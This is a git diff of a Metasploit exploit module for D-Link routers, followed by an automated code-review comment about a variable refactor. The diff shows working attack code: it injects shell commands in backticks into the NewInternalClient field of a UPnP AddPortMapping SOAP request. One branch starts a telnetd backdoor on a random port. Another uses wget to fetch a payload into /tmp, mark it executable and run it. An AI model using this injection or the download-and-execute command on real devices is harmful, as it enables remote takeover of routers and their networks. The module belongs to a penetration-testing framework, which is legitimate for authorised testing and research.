Use instance variables

unstable
jvazquez-r7 2013-07-19 14:46:17 -05:00
parent e93eef4534
commit 4beea52449
1 changed files with 20 additions and 20 deletions


@ -85,51 +85,51 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
new_portmapping_description = rand_text_alpha(8) @new_portmapping_descr = rand_text_alpha(8)
new_external_port = rand(65535) @new_external_port = rand(65535)
new_internal_port = rand(65535) @new_internal_port = rand(65535)
if target.name =~ /CMD/ if target.name =~ /CMD/
exploit_cmd(new_external_port, new_internal_port, new_portmapping_description) exploit_cmd
elsif target.name =~ /Telnet/ elsif target.name =~ /Telnet/
exploit_telnet(new_external_port, new_internal_port, new_portmapping_description) exploit_telnet
else else
exploit_mips(new_external_port, new_internal_port, new_portmapping_description) exploit_mips
end end
end end
def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description) def exploit_cmd
if not (datastore['CMD']) if not (datastore['CMD'])
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end end
cmd = payload.encoded cmd = payload.encoded
type = "add" type = "add"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
type = "delete" type = "delete"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
return return
end end
def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description) def exploit_telnet
telnetport = rand(65535) telnetport = rand(65535)
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
cmd = "telnetd -p #{telnetport}" cmd = "telnetd -p #{telnetport}"
type = "add" type = "add"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
type = "delete" type = "delete"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
return return
end end
def exploit_mips(new_external_port, new_internal_port, new_portmapping_description) def exploit_mips
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Exploit::Remote
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}" cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
type = "add" type = "add"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end end
@ -236,13 +236,13 @@ class Metasploit3 < Msf::Exploit::Remote
register_file_for_cleanup("/tmp/#{filename}") register_file_for_cleanup("/tmp/#{filename}")
type = "delete" type = "delete"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
end end
def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) def request(cmd, type)
uri = '/soap.cgi' uri = '/soap.cgi'
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Exploit::Remote
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping" soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">" data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>" data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
data_cmd << "<NewLeaseDuration></NewLeaseDuration>" data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>" data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
data_cmd << "<NewEnabled>1</NewEnabled>" data_cmd << "<NewEnabled>1</NewEnabled>"
data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>" data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
data_cmd << "<NewRemoteHost></NewRemoteHost>" data_cmd << "<NewRemoteHost></NewRemoteHost>"
data_cmd << "<NewProtocol>TCP</NewProtocol>" data_cmd << "<NewProtocol>TCP</NewProtocol>"
data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>" data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
data_cmd << "</m:AddPortMapping>" data_cmd << "</m:AddPortMapping>"
else else
#we should clean it up ... otherwise we are not able to exploit it multiple times #we should clean it up ... otherwise we are not able to exploit it multiple times
@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping" soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">" data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>" data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
data_cmd << "</m:DeletePortMapping>" data_cmd << "</m:DeletePortMapping>"
end end
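Review bot: `request(cmd, type)` now reads `@new_portmapping_descr`, `@new_external_port` and `@new_internal_port`, which the visible code assigns only at the top of `exploit`, so the method has a hidden precondition its signature no longer shows. If any path outside these hunks reaches `request` without going through `exploit`, the nil values interpolate as empty strings and the SOAP body goes out with empty fields and no error. A comment above the definition such as `# relies on @new_external_port, @new_internal_port and @new_portmapping_descr being set by exploit` would make the coupling explicit. The abbreviated `@new_portmapping_descr` is also inconsistent with the two fully spelled names beside it. The bodies of `exploit_mips` and `request` continue outside the visible hunks.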